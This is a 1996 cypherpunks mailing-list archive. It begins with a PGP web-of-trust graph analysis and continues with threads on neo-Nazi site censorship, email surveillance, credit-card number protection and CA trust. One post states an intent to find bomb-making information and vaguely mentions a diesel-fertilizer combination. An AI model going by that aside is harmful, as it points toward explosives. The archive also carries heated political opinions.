   signature path). Note that we are not incorporating any PGP-specific
   rules for establishing trust (e.g. the default CERT_DEPTH of 4, the
   default requirement for two 'marginally trusted' introducers to
   establish trust, etc.).
   
   After running pgp -kc on the keyring (with MIT PGP 2.6.2, for almost 2
   days...) the number of signatures dropped from 28031 to 25810,
   presumably because some old signatures where thrown out. The analysis
   here was done with the original keyring, so all versions of PGP will
   not recognize all the signatures which are accepted here.
   
   Note that the program used for this analysis (pgpstat.java) so far
   only deals with keyID-keyID relationships, rather than dealing
   separately with each keyID/UserID pair. It does properly ignore
   revoked keys.

Size of 'strong': largest strongly-connected component: 1291
Size of 'signees': keys signed by 'strong':             2775
Size of 'signers': keys which sign 'strong':            2001

   The [7]largest strongly-connected component of this keyring (the set
   names 'strong') has 1291 keys in it. The [8]next-largest
   strongly-connected component has only 16 keys in it. There are another
   1484 keys which are directly or indirectly signed by at least one key
   in 'strong' but which do not sign any key in 'strong' and are thus not
   in the strongly-connected component, for a total of 2775 keys in the
   'signees' set that can be reached from the 'strong' set. Similarly,
   there are a total of 2001 keys in the 'signers' set which directly or
   indirectly sign at least one key in the strong component.
   
Shortest-Path Distances

   Using a breadth-first search of the keyspace, we can calculate the
   shortest path from one keyID to other keyIDs it has directly or
   indirectly signed.

Mean distance from strong keyIDs to signees:    6.41189
Mean distance to strong keyIDs from signers:    6.70961

Maximum shortest-path distance:                 21

   First, for each key in 'strong', we compute the mean length of the
   shortest path necessary to reach each key in 'signees': 6.41189. Next
   we do the converse, following paths of signatures into the strong
   component rather than out of it. The mean distances are different
   because a different set of keys is involved: signers vs signees.
   
   Finally, we note that there are several pairs of keys which have a
   shortest path distance of 21 between them. Here is the [9]example
   path, between these two keys:

6CB05C95 Karl F. Scheibner <scheibner@llnl.gov>
82996935 Brett Dubroy <1:225/357@fidonet.org>

   Anyone who is along this path can improve the tightness of the web of
   trust by finding someone they know further along the path and
   carefully signing their key.
   
Centers of Trust: the Central Trustee and Central Truster

   By examining the shortest-path data more closely we can identify the
   keys which are closest to the 'center' of the web of trust. The
   'central trustee' is the key which is signed most directly by others:
   the key which has the shortest mean distance from all of the
   'signers'. Here is the current "top 10":

Mean    Max     KeyID           UserID
4.17191 11      CE766B1F        Paul C. Leyland <pcl@foo.oucs.ox.ac.uk>
4.30235 12      53AAF259        Klaus-Peter Kossakowski, DFN-CERT <kpk@cert.dfn
.de>
4.37881 12      32DD98D9        Vesselin V. Bontchev <bontchev@complex.is>
4.38381 12      D410B7F5        DFN-CERT <dfncert@cert.dfn.de>
4.4043  13      DA0EDC81        Phil Karn <karn@unix.ka9q.ampr.org>
4.4073  12      F82CEA91        Simon Cooper <sc@sgi.com>
4.43778 13      C1B06AF1        Derek Atkins <warlord@MIT.EDU>
4.46527 13      466B4289        Theodore Ts'o [SIGNATURE] <tytso@mit.edu>
4.47576 12      C7A966DD        Philip R. Zimmermann <prz@acm.org>
4.48426 12      8E0A49D1        Wolfgang Ley, DFN-CERT <ley@cert.dfn.de>

   You can also get the [10]full list by mean distance.
   
   Here is the [11]distance to the cental trustee from the each of the
   signers along with info on how many keys sign and are signed by each
   key.
   
   The converse of this is the 'central truster', the key which trusts
   other keys most directly:

Mean    Max     KeyID           UserID

3.91928 10      32DD98D9        Vesselin V. Bontchev <bontchev@complex.is>
3.97694 11      C7A966DD        Philip R. Zimmermann <prz@acm.org>
4.0191  12      DA0EDC81        Phil Karn <karn@unix.ka9q.ampr.org>
4.0418  12      0DBF906D        Jeffrey I. Schiller <jis@mit.edu>
4.05838 11      CE766B1F        Paul C. Leyland <pcl@foo.oucs.ox.ac.uk>
4.08396 12      7B7AE5E1        Germano Caronni <caronni@tik.ee.ethz.ch>
4.08973 11      4D0C4EE1        Jeffrey I. Schiller <jis@mit.edu>
4.13405 12      666D0051        Assar Westerlund <assar@pdc.kth.se>
4.17333 12      5826CF8D        John Gardiner Myers <jgm+@cmu.edu>
4.17982 12      466B4289        Theodore Ts'o [SIGNATURE] <tytso@mit.edu>

   You can also get the [12]full list by mean distance.
   
   Here is the [13]distance to each of the 'signees' from the central
   truster, along with info on how many keys sign and are signed by each
   key.
   
Further Questions

   Many other aspects of the web of trust could be explored.
     * It is important that the web be multiply-connected. p Good
       software to do bi-connectivity (or tri-connectivity, etc.) for
       directed graphs would be useful, especially if it identifies the
       most significant articulation points (keys which are critical for
       the connection of big pieces of the web).
     * Identification of large cliques or near-cliques (sets of keys
       which all sign each other, related to coloring problem, very
       hard.)
     * Software to generate a high-level graphical view would be useful.
       For example, a directed-acyclic-graph of the connectivity of the
       larger strongly-connected components would be interesting.
     * It shouldn't be too hard to make pgpstat.java into a server which
       could answer custom queries (shortest path from x to y, size of
       component that x is in, suggestions for who might be able to sign
       your key (e.g. other keys from the strongly-connected component
       which are in your domain), etc.)
       
Tools

   The analysis tool, pgpstat.java, is an application written in the very
   nice new language [14]Java (Perl just doesn't have any decent
   hierarchical data structure support...). Source code will probably be
   made available after some cleaning-up for others who want to explore
   different keyrings or other avenues of analysis.
   
   Performance note: the algorithms used here mostly scale linearly in
   time complexity, based on the sum of the numbers of keys and
   signatures. In particular this is true for the code that finds the
   strongly-connected components (thanks to a favorite professor of mine,
   Bob Sedgewick, and his "Algorithms" book!)
   
   The one notable exception is finding the centers of trust and the
   longest shortest-path, which is quadratic in the size of the connected
   set, but doesn't have to be computed nearly as often, as a practical
   matter. The full analysis took less than 30 minutes using one
   processor on a Sun Sparc 1000 (50 Mhz?). There are lots of
   opportunities for optimization, and hopefully non-quadratic algorithms
   for at least approximating the center/longest path problems.
   
   Please let me know if you have any feedback on this analysis.
     _________________________________________________________________
                                      
   [15]Neal McBurnett <neal.mcburnett@att.com>

References

   1. http://www.quadralay.com/www/Crypt/PGP/pgp00.html
   2. http://www.pgp.net/pgp/email-key-server-info.html
   3. http://www.pgp.net/pgp/www-key.html
   4. ftp://ftp.uit.no/pub/crypto/pgp/keys/pubring.pgp
   5. file://localhost/home/neal/public_html/pgpstat/public-keys.960101.pgp
   6. http://www.quadralay.com/www/Crypt/PGP/pgp06.html#608
   7. file://localhost/home/neal/public_html/pgpstat/strong-from
   8. file://localhost/home/neal/public_html/pgpstat/strong2
   9. file://localhost/home/neal/public_html/pgpstat/maxpath
  10. file://localhost/home/neal/public_html/pgpstat/strong-from
  11. file://localhost/home/neal/public_html/pgpstat/signers
  12. file://localhost/home/neal/public_html/pgpstat/strong-to
  13. file://localhost/home/neal/public_html/pgpstat/signees
  14. http://www.javasoft.com/
  15. http://bcn.boulder.co.us/~neal/Home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMRL1t8KbwnFPAGm1AQHizwIAn+HiF7ohgcxlYAI9OS4St9FFghzCQ+8v
TQYKssbcqS06Y0kkeTYyKFBRfwTrulxugE+aq6Jchpw2vo0C6YvEdA==
=mXbe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 3 Feb 1996 14:22:49 +0800
To: Neal McBurnett <Neal.McBurnett@att.com>
Subject: Re: Analysis of PGP keyserver web of trust
In-Reply-To: <9602030545.AA06363@lever.dr.att.com>
Message-ID: <Pine.SOL.3.91.960202220137.12585A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


There's a bunch of nifty graph-mangling code available as part of the 
stanford graphbase (literate CWEB, written by DEK; I think that had some 
stuff for bi-connectedness).


Simon //  TeX Files - Don Knuth is out there




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 3 Feb 1996 12:12:28 +0800
To: cypherpunks@toad.com
Subject: sent to U.Mass
Message-ID: <9602030349.AA03495@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi CPunks.

I went into www.umass.com, somewhere into it up untill I could find an e-mail
adress, and mailed this letter:



-----BEGIN PGP SIGNED MESSAGE-----

to: Dean of the University.

From: Jean-Francois Avon
Pierrefonds, QC, Canada

jf_avon@citenet.net


While I do not believe nor endorse the neo-nazi movements and their ideas, I consider interesting to be able to look at their arguments, if only to make my own opinion of them.

I understand that you banned a WWW site providing such information.  I also understand that this site presented this information to oppose the german govt. in their censoring actions against some such sites.  I do not have a first hand knowledge of the content of the specific site (Zundel) that started the whole thing and I am convinced that many other pro-nazi might use some material presented in a decent way for quite questionnable ends.

But nevertheless, from what I read, you seemed to have banned a site out of political correctness.  I hope it is not true.

Unfortunately, freedom and liberty, thoses crutial and typically american values, seems to be eroded first by thoses trusted to protect them: the american intellectual and scholar.

We live in a very sad world, where reason is dissapearing slowly, being replaced by fear and low animal instincts.

Please pardon my poor english.

Jean-Francois Avon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRK0IgOWptJXIUrtAQHt1AP+ND5LeFPpc/ypyS2eBkK1SAsAyZazNpBf
t9vrBs3LOgu8wCmfKV+H9Qczfp4wCtcs3gMux+U7w1E7Xj556iPBCXNcYLVI/RBN
8DzJLYN3ANlJIZqKDSv+GGmsfvx+wIXKEFiM8lKV+D1PZIeZ1HEdy9N3vT6H12oL
1LOQKRLG4tM=
=H4wq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 13:40:14 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Sometimes ya just gotta nuke em
Message-ID: <ad382f4421021004fcae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 AM 2/3/96, Rich Graves wrote:

>Who holds up the nuking of Hiroshima and Nagasaki as great victories
>against tyranny?

Since you ask, I do.

A land invasion of Japan would've likely cost half a million American
lives, and perhaps a million or more Japanese citizen lives, according to
comprehensive studies I think are on the mark.

(Anecdotally, my father was on Guam at that time, and was part of the force
being prepared for the land invasion of Japan. He was mighty happy to hear
about the new wonder weapon and how it ended the war in days rather than
months.)

If the war was just, then ending it quickly and decisively was more just
than ending it more slowly and painfully. That some Japanese died in a
nuclear fireball rather than in conventional firestorms or blockbuster
bombings is neither here nor there.

Sometimes ya just gotta nuke em.


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Sat, 3 Feb 1996 17:21:33 +0800
To: cypherpunks@toad.com
Subject: Re: Just what the Internet needs right now...
Message-ID: <v02140b00ad38a21d561f@[199.1.154.164]>
MIME-Version: 1.0
Content-Type: text/plain


>        I'll try to see if I can find some bomb-making information from a
>non-US web site; it may help in counterarguments. Given that I'm still not
>that good at searching, it would be nice if someone else could locate it also.
>        -Allen
>
>Reuters New Media
>
>   _ Friday Febuary 2 4:54 PM EST _
>
>Boys Arrested for Plotting Bomb
>
>
>
>   NEW YORK (Reuter) - Three 13-year-old boys have been accused of
>   plotting to blow up their school after learning how to build a bomb
>   over the Internet, police said Friday.
>
>   The boys were arrested Wednesday after other students at Pine Grove
>   Junior High School in Minoa, New York, heard rumors of their plans and
>   police were alerted, said Capt. William Bleyle of the nearby Manlius
>   police department.
>
>[...]
>
>   One of the boys, believed to be the ringleader, admitted to police
>   that the three eighth graders learned how to build the bomb from
>   instructions they found on the Internet, the global network accessible
>   from home computers.

This was on the national TV news tonight as well.  I'm still trying to
figure out what planet all these people are from.  Boys and bombs have gone
together at least since i was a boy.  Teenage boys were building pipe bombs
back when i was a teenager, in the seventies, before anyone had heard of
personal computers or the internet.  Of course, i didn't learn about bombs
for blowing up entire buildings until much later, when some television show
mentioned combining diesel fuel with  fertilizer.  This show even got
specific as to the type of fertilizer, but i forgot to take notes.

The only counter-argument than makes any sense to me is that this isn't
new.  Boys have been building bombs for years.  Now they get their
information from the internet instead of the library or older kids down the
street.  The information has always been available.

Of course, there is always the argument about parental responsibility, but
that's not as sexy as the evil internet.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 3 Feb 1996 16:55:18 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Germany investigates AOL for providing Zundelaccess
Message-ID: <199602030836.AAA13781@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 PM 2/2/96 -0500, Declan B. McCullagh wrote:
>      America Online spokesman Ingo Reese in Hamburg said his company
> also was happy to work with the prosecutors. The company is ``totally
> opposed'' to illegal propaganda, he said,

They target the gutless, in order to create precedents 
without having to go to court.

You will recall that AOL also shopped its customers to the 
feds over child pornography.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 17:00:42 +0800
To: cypherpunks@toad.com
Subject: Re: Helping the Crypto-Clueless
Message-ID: <Pine.ULT.3.91.960203002327.24317F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh's latest missive inspired me to send the following to my new
racist friends, and also, coincidentally, to those at the Wiesenthal
Center, law enforcement agencies, and so on who also read the list.  Posts
to Stormfront-L are moderated to keep out any non-racist "noise," but I
assume that this message will be approved. Don really has no other choice. 

I imagine that this message will inspire greater awareness of and interest
in cryptographic applications, though I do not have great confidence that
it can do much to address my friends' cluelessness as such. 

I was not inclined to give them any real specifics on how to obtain and
employ cypherpunkish tools. After all, we're not very close friends. 

-rich

---------- Forwarded message ----------
Date: Sat, 03 Feb 96 08:21:32 0800
From: Not_By_Me_Not_My_Views Publishing <rich@c2.org>
To: stormfront-l@stormfront.org, rich.graves@leland.stanford.edu
Subject: Publicizing Stormfront-L; Internet privacy resources; Copyrights

-----BEGIN PGP SIGNED MESSAGE-----

I was surprised and disappointed to learn recently that there are no 
public archives of the Stormfront list. Many organizations, most of 
whom are strongly opposed to Stormfront's goals, seem to be keeping 
private logs of everything that is said on Stormfront-L, but to date 
none have made their archives public.

I find this silly. It's an open list, after all, and you know that 
people who do not share your goals are reading the list. With all this 
talk about The Enemy and free expression, it's odd that only The Enemy 
has accurate chronicles, and that you deny the general public the 
right to read what you say.

To address this oversight, I will be opening up my personal archives 
of Stormfront-L to public view on c2.org's Web server. I haven't 
worked out the details yet, but I'll probably be using hypermail, if 
this use is judged to satisfy the license terms.

Don't bother unsubscribing me. There are lots of people who would be 
only too happy to send me their copies of list mail, anonymized. Don't 
bother moving to another list, either, unless you don't mind losing 
all members of the list whose loyalties cannot be established beyond a 
reasonable doubt. See, you can't exactly announce on the list that 
you're moving to a new list where The Enemy can't find you.

Despite the fact that it has always been trivial to determine the list 
membership, I plan to respect list members' privacy by giving you all 
a day to avail yourselves of the large number of anonymity and double-
blind pseudonymity resources available on the Internet.

For information on the most well-known remailer, the penet.fi 
anonymous contact service, send email to both help@anon.penet.fi 
(sends you the FAQ) and ping@anon.penet.fi (assigns you an ID). The 
disadvantages of the penet.fi service are that it is slow (mail is 
delayed as much as 24 hours) and that it is not really secure (records 
of which IDs belong to which real email address are kept on a computer 
in Finland, and are therefore available to very determined law 
enforcement officers and other armed thugs).

Those with a technical bent may wish to look into more secure 
cypherpunk remailers, but they require some brains. Even I don't 
really use them.

Alternatively, if one or more of you have the means and incentive to 
set up a public Stormfront-L archive on the Internet, and very soon, 
then please let me know, and I will drop my plans. The advantages of 
an official public list archive run by someone who shares your goals 
should be obvious. Of course, private archives will still be kept by 
third parties in order to ensure that the official archive remains 
accurate and up to date. Checks and balances, natch.

I would be happy to provide some technical assistance if you need help 
getting started.

On to copyrights. The issue of who owns the copyrights to the 
Zundelsite pages has been raised both privately and publicly (very 
publicly).

It appears that Mr. Zundel has made his choice. The Zundelsite 
materials are in the public domain. Anyone can use them, abuse them, 
modify them, or sell them without violating anyone's intellectual 
property rights. May a thousand Zundelsites bloom. You may also 
include his works on BBSes, CD-ROMs, and T-shirts that you sell for 
personal profit. I'm working on a T-shirt for the "Zundel 
Detournement" contest right now. I doubt any of you would be 
interested in buying one, though.

Still, it would be much better if a formal network of mirror sites was 
established. That way you'd have a channel for receiving updates 
direct from Zundel's webmasters. Unfortunately, it seems that Mr. 
Zundel is embarrassed by the thought of being associated with the 
people who actually want to mirror his site for the content. He has 
had to  publicly distance himself from the very proud white 
supremacist Joe Bunkley, for example.

Most sincerely,

- -rich

P.S. You may have heard it reported recently that the author of PGP, 
which I am using (if this message does not bear a valid PGP digital 
signature, it is probably a forgery) is a Neo-Nazi sympathizer. This 
was untrue, and Phil considers this suggestion to be a serious libel. 
The newspaper that ran the allegation posted a very public and 
detailed retraction. Of course some Neo-Nazi sympathizers do use PGP, 
and so can you. In fact I'd love to exchange key signatures with one
of you guys in the San Francisco Bay Area (I'm sure there are a lot
of you here).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRMa2Y3DXUbM57SdAQFQfwP+LV5H6+YPv9E7HHfmgcm7dQLDf/layB8s
xzUjH5QX8zdWNE5t+9gQt3W7sG3pN1IQ32IxclcmlMBZIQmVzmZ7rbsGq07gwpPc
I7yLqK0KAz8tNND+ZBtXX/lLQ4zu46cb6p2fJsMDS5Gv+cWA+smNE44CiM9reeNX
xlQAV5UeeLA=
=LpPb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 17:20:28 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Germany investigates AOL for providing Zundelaccess
In-Reply-To: <199602030836.AAA13781@blob.best.net>
Message-ID: <Pine.ULT.3.91.960203005634.24317I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Feb 1996, James A. Donald wrote:

> At 07:34 PM 2/2/96 -0500, Declan B. McCullagh wrote:
> >      America Online spokesman Ingo Reese in Hamburg said his company
> > also was happy to work with the prosecutors. The company is ``totally
> > opposed'' to illegal propaganda, he said,
> 
> They target the gutless, in order to create precedents 
> without having to go to court.
> 
> You will recall that AOL also shopped its customers to the 
> feds over child pornography.

Didn't they have a court order? Sure they could have resisted, but they
didn't bend quite so far over backwards that they were really bending over
forwards. 

This is an exapmple of the kind of defeatist attitude that I think is 
counterproductive. Instead, say:

"With all the press attention being paid to censorship issues right now,
with the ridiculously Unconstitutional so-called Communications Decency
Act and so on, even America 'Online' is not likely to be so stupid and
spineless as to buckle under now. Ferchrissakes, the guy who runs
webcom.com is the grandson of a Holocaust victim; he deserves everyone's
undying respect for his commitment to the freedoms of someone he so
despises, and is simply not going to lose business because of this stand.
We won't let it happen." 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 3 Feb 1996 14:32:59 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <v01530502ad38a2744d97@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:02 PM 2/2/96, Timothy C. May wrote:
>*Universities, corporations, and even ISPs are explicitly adopting policies
>that allow them to inspect e-mail at will. (If the arrangement is made in
>advance, it may not violate the ECPA to do this...and I'm not saying there
>aren't some good reasons why these entities would want the right to inspect
>e-mail (their liability being a good example), just noting the growing
>situation.

On that note...

A good friend of mine was fired (forced to resign) from her Wall Street
programming job recently.  The reason: her employer "just happened" to
stumble onto a message she'd posted to a mailing list a year ago, in which
she'd said some "very unflattering" things about the company.  The message
in question was posted from her personal email account (so it in no way
violated the company's rather strict internet use policy) and was the only
such message she'd ever posted.

However, one other piece of email was cited, this one also containing an
unflattering reference to the company but never mentioning them by name.
The obvious conclusion is that they hadn't merely come across this stuff in
an innocent Alta Vista search for "Company Name," but rather had searched
for my friend's name specifically.

My friend is looking into various legal options, so she's asked me not to
say any more for now.  But I consider this a very serious development and a
frightening precedent.  The company in question, incidentally, also does
routine scans of email and archives all incoming and outgoing mail.

As I and others have been saying for a while: what's happening on the net
is another "enclosures" movement.  Yes, I know that on this list that's a
politically incorrect view.  Deal with it.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 3 Feb 1996 15:49:21 +0800
To: cypherpunks@toad.com
Subject: PGP & thee
Message-ID: <2.2.32.19960202191849.006aee34@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have a couple of questions about the variants of PGP on the CP ftp site:

1> What are the different Mac versions about? Which one goes with which Mac?

2> What are the differences in the different DOS/OS2 versions?

Reason I'm asking is that I've got some folks interested in using PGP, and I want to be able to point them in the right direction.

Emailed responses preferred to save listwidth :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRJGisVrTvyYOzAZAQHxygQAoSHE5FOC20manSJvjprKjUkZyrj/3iCC
dz59IKftq6xxVYEE6ys/m0xnwIEBygayfqQzcvco66QfasFjCbKWakGQgOuW7bnk
UToLUSpnP31UBCozASRrSCDh1he535WHCegqTVCr7dUweDuPC7CGmpp9G78WsmfH
mWNvdOim76s=
=tgOX
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 23:39:46 +0800
To: cypherpunks@toad.com
Subject: Don't shot till you see the gray of their eyes
Message-ID: <199602030030.BAA27037@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Now I understand it.

That thing on the cover of Applied Crypto is really
one of the Gray's space ships that they use to abduct
aspiring cryptographers and implant microchips in them,
controlling their minds and making them obey RSA's
license agreement.

Very interesting indeed.

On a lighter note, a local NBC station advertised a
special they will have this monday, about the 1-800-INFO-PET
chips... only that parents are opting to have them implanted
in their newborn children.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 09:59:15 +0800
To: cypherpunks@toad.com
Subject: Don't shot till you see the gray of their eyes
Message-ID: <199602030030.BAA27066@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Now I understand it.

That thing on the cover of Applied Crypto is really
one of the Gray's space ships that they use to abduct
aspiring cryptographers and implant microchips in them,
controlling their minds and making them obey RSA's
license agreement.

Very interesting indeed.

On a lighter note, a local NBC station advertised a
special they will have this monday, about the 1-800-INFO-PET
chips... only that parents are opting to have them implanted
in their newborn children.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Feb 1996 18:19:56 +0800
To: cypherpunks@toad.com
Subject: Crypto suggestion - re: Fatal Flaws in Credit Cards
Message-ID: <199602030951.BAA12301@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel's written about the "fatal flaw" in any system that
involves typing credit card numbers into your computer being that
they're easy for a keyboard-sniffer or similar cracker to recognize.
An obvious work-around for this (and for many of the problems with
Social Security / Taxpayer ID numbers) is to use some sort of smartcard
that generates one-shot numbers that the credit card company (or tax thugs)
can map back to the "real" owner's ID.  The downside of this approach
is that you need a lot of bits to support it, since you have to accomodate
the expected number of users * the average uses/user + overhead,
and that may (for credit cards) be annoyingly long to type in
(though fine for electrical-interface cards, or cards that display
their numbers as barcodes for a wand reader, or whatever.)

Some potential algorithms:
1) public-key - 512 bits isn't really enough (cracking it doesn't necessarily
        let you charge to everybody's Visa number, but it does let you
        figure out what everybody's is), and that's already too long.

2) data-base of randomly generated numbers - the would do ok for SSNs;
        give everybody a dozen or two, and let them get more if
        they want.  That wouldn't even require a smartcard, but it
        would tend to require a SSN card that you don't lose,
        since you probably won't remember the dozen long numbers on the back.
        This would of course require redesigning all those databases
        that know an SSN is 9 digits long - I view this as a Good Thing,
        especially since it may get people to stop using them as database keys.

        Is it practical for credit cards?  Ten billion customers times
        a million uses each is 16 digits; I suppose that's not much longer
        than current card numbers, though each card company would need to
        keep track of more numbers.  You'd probably cache a hundred or a
thousand
        in the card, and update the card every couple of years?

3) Some kind of hash or secret-key encryption of a constant (your "real"
card number)
        and a random number?  This would still be susceptible to brute-force
        search (10**20 not being an exceptionally large number), and you'd
        need an algorithm with either zero or a very low probability of
        collisions.  A secret-key version would require a tamper-proof card
        to reduce probability of theft, and I'm not sure I believe in
        tamper-proof cards, even if you have a lot of keys and a salt
        that tells the credit-card company which key to use.

Any other suggestions?
        
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Feb 1996 18:19:02 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
Message-ID: <199602030951.BAA12305@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 PM 1/29/96 -0500, Nathaniel wrote:

>Have you downloaded my key from the net?  Assume that you have.  How do
>you know it's mine?
>
>I use PGP about 20 times per day.  I use it in a manner that is
>*meaningful*.  Unless we have in some way or another verified each
>others' keys, it is meaningless for me to sign a message to you. 
>Putting a PGP signature on a message to someone who has no way of
>verifying your keys is a nice political statement, but is utterly
>meaningless in terms of adding any proof of the sender's identity.  --

We have this discussion around here occasionally; one thing it does
is allows somebody to know that different messages were from the
_same_ person, whether that person is using a purported True Name
or an outright alias.  Another thing it does is allows you to demonstrate,
if need be, that you have the keys that were used to sign a message,
by signing another message with the same key, and optionally by
doing the Web Of Trust thing to validate your identity to someone.
I'm not aware that anyone's actually _done_ this in court,
but Utah and maybe other states have laws recognizing the validity of
digital signatures, and other courts could at least accept it along
with the usual Expert Witnesses.

Obviously it doesn't let you prove that an unsigned message isn't from you,
but that's pretty tough without requiring all messages to be
signed with your True Nationalist-ID-Card Is-A-Citizen Key.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Feb 1996 18:19:06 +0800
To: cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (gifs at 11!)
Message-ID: <199602030951.BAA12309@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 AM 1/30/96 -0500, Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
>>  But I just can't believe that he thinks that
>the telephone is more secure on average than a keyboard.
>
>We have a few pages of C code that scan everything you type on a
>keyboard, and selects only the credit card numbers.  How easy is that to
>do with credit card numbers spoken over a telephone?
>The key is large-scale automated attacks, not one-time interceptions.

Speaker-independent recognition of digits is a done deal.
For large-scale automated attacks, you obviously don't wiretap the customer;
you hire The Dread Pirate Mitnick* to wiretap the 800 number for the
Home Shopping Channel, and hoover down the CC numbers of a large
number of known frequent-shopping cardholders.  (Actually, hitting on them
might be a bit tough, since they've presumably got direct T1s or T3s from
one or more carriers, which are harder to tap than the average residence line.)


(*Not the original Kevin "Dread Pirate" Mitnick, who's retired,
but Fred Bargle, who's got the current Dread Pirate Mitnick franchise.... :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Feb 1996 18:19:12 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, CAs, and Verisign
Message-ID: <199602030951.BAA12320@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:50 PM 1/30/96 -0500, Phill wrote:
>Question is how can Netscape (or anyone else) _securely_ allow an arbitrary
CA's 
>certificate to be used? Certainly the process cannot be automatic. Binding the 
>Verisign public key into the browser may be an undesirable solution, but the 
>problem is to think of a better one.

It's easy, and I gather Netscape has done it in 2.x - let the _user_ decide
what CAs
to trust.  For convenient verification, you can have the user sign the
keys for each of the CAs, and then the chain-following software only needs
to compare each certificate's signer with the user's own pubkey, rather than
comparing with Verisign's.  If you want to be automatic about it, you _could_
have the user sign Verisign's key when first generating keys, or you could
ask the user the first time.  

You've got to pull the wool over your _own_ eyes, here :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





